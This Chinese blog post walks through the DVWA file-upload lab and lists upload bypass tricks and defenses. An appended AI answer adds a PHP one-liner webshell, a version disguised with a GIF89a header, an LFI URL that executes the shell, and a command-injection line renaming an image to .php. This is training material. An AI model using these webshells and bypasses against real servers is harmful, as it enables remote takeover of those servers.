DVWA —— File Upload 文件上传

文章详细阐述了文件上传漏洞的原理,从Low到Impossible级别的渗透思路,包括直接上传、Content-Type修改绕过、利用文件包含和命令注入获取webshell的方法。同时,对比了不同安全级别的源码差异,并提出了相应的防御措施,如后缀名限制、MIMEType校验和文件内容头校验等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

漏洞原理

Low

渗透思路

直接上传

Medium

渗透思路

Content-Type 修改绕过

源码对比

Low & Medium 源码

对比小结

High

渗透思路

上传图片马

文件包含图片马获得 webshell

命令注入获得 webshell

源码对比

Medium 源码

High 源码

对比小结

Impossible

源码对比

High 源码

Impossible 源码

对比小结

绕过

防御


漏洞原理

文件上传漏洞通常由于网页代码中的文件上传路径变量过滤不严或webserver相关解析漏洞未修复而造成的,如果文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,攻击者可通过 Web 访问的目录上传任意文件,包括网站后门文件(webshell),进而远程控制网站服务器。 攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!

Low

渗透思路

直接上传

用最无脑的方式也能成功,看图说话:

Medium

渗透思路

Content-Type 修改绕过

文件上传绕过的方式有很多,比如 Content-Type 修改绕过

源码对比

Low & Medium 源码

对比小结

Medium 源码只是对文件类型 Content-Type 和文件大小做了校验,还有很多其他方式可以绕过

High

渗透思路

  1. 上传图片马,结合文件包含漏洞获得 webshell
  2. 上传图片马,结合命令注入漏洞获得 webshell

上传图片马

文件包含图片马获得 webshell

利用已知的文件包含漏洞获得 webshell

第一次路径推测错误,但报错信息暴露了绝对路径

根据获得到的绝对路径拼接图片马

命令注入获得 webshell

上传图片马后,通过命令执行漏洞修改文件名后缀

|cp ../../hackable/uploads/pic_shell.jpeg ../../hackable/uploads/pic_shell.php

源码对比

Medium 源码

High 源码

对比小结

High 比 Medium 级别多了如下措施:

  1. 添加了文件后缀名白名单
  2. 限制文件大小和图片大小

Impossible

源码对比

High 源码

Impossible 源码

对比小结

相比 High 等级, Impossible 增加了如下措施:

  1. 校验 CSRF Token
  2. 上传文件名用 md5 哈希值重命名,难预测
  3. 校验文件类型 Content-Type
  4. 对上传的文件进行了二次渲染

绕过

  1. 修改/删除/禁用JS
  2. 修改MIME
  3. 等价扩展名绕过
  4. 大小写
  5. .htaccess
  6. 双写
  7. 空格
  8. ::$DATA
  9. %00截断或0x00截断
  10. 图片马
  11. 条件竞争

防御

  1. 后缀名限制白名单,黑名单(不可靠
  2. MIME Type
  3. 文件内容头校验(GIF89a)
  4. 二次渲染(resize 压缩)
  5. 用随机数改写文件名和文件路径
  6. 专用安全设备过滤内容
  7. 限制文件大小
  8. 文件上传目录取消执行权限,使上传的脚本不能执行
  9. 杜绝文件包含漏洞
<think>嗯,用户想了解DVWA中的文件上传功能的安全测试或漏洞利用方法。首先,我需要回忆一下DVWA的基本情况。DVWA是一个用于练习Web应用漏洞的靶场,文件上传漏洞是常见的漏洞类型之一。用户可能需要从基础的上传恶意文件开始,逐步深入。 首先,安全测试通常包括绕过客户端验证。DVWA可能有不同安全等级的设置,比如Low级别可能只在前端做检查,而High级别可能有更严格的后端验证。例如,在Low级别下,用户可以直接上传PHP文件,因为服务器可能没有验证文件类型或内容。这时候需要指导用户如何修改前端代码,比如删除JavaScript验证,或者使用Burp Suite拦截请求修改文件类型。 接下来是绕过MIME类型检查。服务器可能会检查Content-Type,比如image/jpeg。这时候需要将恶意文件的Content-Type改为允许的类型,这可能通过Burp Suite修改请求头来实现。 然后是绕过扩展名检查。有些服务器通过黑名单来阻止危险扩展名,但可能遗漏某些情况,比如.php5、.phtml等。用户可以尝试上传这些变种扩展名,或者利用双扩展名如test.php.jpg来绕过检查。 对于内容检查,服务器可能检测文件头,比如GIF文件的GIF89a标识。用户可以在恶意文件前添加这些标识,伪装成图片文件,同时保留PHP代码。这需要一定的混淆技巧。 在漏洞利用方面,上传Web Shell是常见方法,比如使用一句话木马<?php system($_GET['cmd']); ?>,然后通过浏览器访问该文件执行系统命令。结合其他漏洞如文件包含漏洞,可以进一步利用,比如通过路径遍历上传文件到非预期目录,或者利用本地文件包含执行上传的恶意文件。 防御措施方面,应该提到白名单验证、重命名文件、存储文件到非Web目录、使用安全扫描工具等方法。例如,引用中的nikto工具可以用来检测常见错误配置,而sqlmap用于SQL注入测试,但文件上传漏洞可能需要其他工具。 需要确保用户理解不同安全等级(Low、Medium、High)的差异,并针对不同等级给出具体方法。例如,High级别可能需要更复杂的绕过技巧,比如结合服务器解析漏洞。同时,提醒用户注意法律和道德规范,仅在授权环境下测试。 最后,生成的相关问题需要覆盖漏洞原理、工具使用、防御措施和结合其他漏洞的情况,确保全面性。需要检查引用中的资料是否相关,比如引用3提到的nikto可以用来检查配置错误,引用4的sqlmap可能与文件上传无关,但用户的问题可能涉及综合测试。</think>### DVWA文件上传漏洞安全测试与利用方法 --- #### 一、漏洞原理 DVWA文件上传功能存在未严格验证文件类型、内容及路径的风险,攻击者可上传Web Shell(如PHP恶意文件)实现远程代码执行[^1]。漏洞等级分为低、中、高三种安全模式,对应不同防御强度。 --- #### 二、安全测试步骤 1. **基础文件上传测试** - **低安全级别**:直接上传`.php`文件(如`shell.php`),验证服务器是否允许执行 ```php <?php system($_GET['cmd']); ?> ``` - **绕过客户端验证**:禁用JavaScript或修改前端代码删除文件类型检查[^5] 2. **绕过MIME类型检查** - 使用Burp Suite拦截请求,将`Content-Type: application/php`改为`image/jpeg`[^3] 3. **绕过扩展名黑名单** - 尝试`.php5`、`.phtml`或双扩展名如`shell.php.jpg` 4. **绕过内容检查** - 在PHP文件头部添加图片标识(如`GIF89a`),伪装成图片: ```php GIF89a <?php system($_GET['cmd']); ?> ``` --- #### 三、漏洞利用示例 1. **Web Shell执行命令** - 上传成功后访问`http://靶机地址/hackable/uploads/shell.php?cmd=whoami`,可返回当前系统用户[^4] 2. **结合文件包含漏洞** - 若存在LFI漏洞,通过路径遍历执行上传文件: ``` http://靶机地址/vulnerabilities/fi/?page=../../uploads/shell.php ``` --- #### 四、防御措施 1. 使用白名单验证文件扩展名和MIME类型 2. 重命名上传文件(如`md5(时间戳).jpg`) 3. 将文件存储在非Web可访问目录[^2] 4. 部署WAF或使用`nikto`扫描检测配置错误[^3] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值